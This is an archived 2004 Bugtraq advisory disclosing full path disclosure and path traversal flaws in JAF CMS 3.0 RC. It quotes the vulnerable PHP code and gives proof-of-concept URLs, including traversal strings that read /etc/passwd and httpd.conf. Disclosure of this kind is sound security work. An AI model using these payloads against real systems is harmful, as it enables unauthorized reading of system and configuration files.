Vulnerabilities in JAF CMS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vulnerabilities in JAF CMS
From: y3dips@xxxxxxxxxxxxxxxxxxxxx, [ echo|staff ]@securityfocus.com@www.securityfocus.com <y3dips@xxxxxxxxxx>
Date: 9 Nov 2004 08:37:25 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


ECHO_ADV_08$2004

---------------------------------------------------------------------------
                          Vulnerabilities in JAF CMS
---------------------------------------------------------------------------

Author: y3dips
Date: November, 4th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv08-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.

Created by Salim "ph03y3nk"
Version affected : 3.0 Release Candidate , Not tested on 0ther Version
Mail Contact : ph03y3nk@xxxxxxxxxxxxxxxxxxxxx
URL: http://jaf-cms.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

A remote user can access the file to cause the system to display an error
message that indicates the installation path. The resulting error message
will disclose potentially sensitive installation path information to the 
remote attacker.


See the script in config.php

---snip---

function displaycontent() {
global $jaf;
        if(file_exists("data/".$jaf['show'])) {
        require_once ("data/".$jaf['show']);
        $filemod = filemtime("data/".$jaf['show']);
        $filemodtime = date("F j, Y", $filemod);
        echo "This page last updated on : <strong>$filemodtime</strong>";
        }
        else {
                if(file_exists("news/".$jaf['show'])) {
                require_once ("news/".$jaf['show']);
                }
                else {
   echo "<p align='center'><img src='images/403-error.gif'><br /><big>
   <strong>Can't find the requested page, Sorry!!</strong></big></p>";
                        }
                }
        }

---snip---

in that files we can see that if we supply another name of page (which is not 
in "data/" directory) , what we get is error message that define in the script
" Can't find the requested page, Sorry!! "

but what if we dont supply anything ? ,bummm ... weve got an error message that 
display installation path.

POC :

http://localhost/jaf/index.php?show=

then we got an error

Warning: displaycontent(data/): failed to open stream: Success in
/var/www/html/jaf/config.php on line 129

Fatal error: displaycontent(): Failed opening required 'data/'
(include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129



B. Path Traversal

Config.php files also vulnerable against basic path traversal attack which is
use "../" special character sequence to alter the resource location requested 
in the URL. Consequently, the results can reveal source code because the file 
is interpreted as text.

Exploit Code :

http://localhost/jaf/index.php?show=../../../../../../../etc/passwd
http://localhost/jaf/index.php?show=../../../../../../../etc/hosts
http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/httpd.conf


--------------------------------------------------------------------------

The fix:
~~~~~~~~

Vendor allready contacted and allready fix it, maybe the vendor will released 
a new version .

------------------------- - -- --- -- - -
report to vendor 4-11-2004
vendor allready fix the bug  6-11-2004
advisories released to securityfocus.com 9-11-2004

---------------------------------------------------------------------------

Disclamier:
~~~~~~~~~~~

Advice, directions, instructions and script on security vulnerabilities
in this advisory for educational purpose, y3dips nor echo.or.id does not
accept responsibility for any damage or injury caused as a result of its use

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ yudhax, biatch-x, lieur-euy
~ newbie_hacker@xxxxxxxxxxxxxxx ,
~ #e-c-h-o & #aikmel   @DALNET

Greetz:
~~~~~~~

~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Prev by Date: Re: Update: Web browsers - a mini-farce (MSIE gives in)
Next by Date: EEYE: Kerio Personal Firewall Multiple IP Options Denial of Service
Previous by thread: [SECURITY] [DSA 591-1] New libgd2 packages fix arbitrary code execution
Next by thread: EEYE: Kerio Personal Firewall Multiple IP Options Denial of Service
Index(es):
- Date
- Thread